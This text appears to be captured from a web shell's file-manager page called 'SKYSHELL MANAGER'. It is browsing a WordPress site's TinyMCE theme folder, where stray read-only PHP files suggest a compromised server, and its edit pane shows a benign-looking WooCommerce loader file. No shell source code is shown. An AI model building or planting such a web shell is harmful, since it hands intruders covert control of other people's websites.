📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: woo-loader.php
<?php /** * Load correct version of file * * @since 4.5.6 */ if ( ! defined( 'ABSPATH' ) ) { exit; } // Exit if accessed directly if ( class_exists( 'WooCommerce' ) && function_exists( 'WC' ) && version_compare( WC()->version, '3.5.7', '>=' ) ) { require_once( 'config.php' ); if( 'block' == AviaGutenberg()->selected_editor() ) { require_once( 'class-avia-wc-block-editor.php' ); } } else { require_once( 'config-356.php' ); }
Save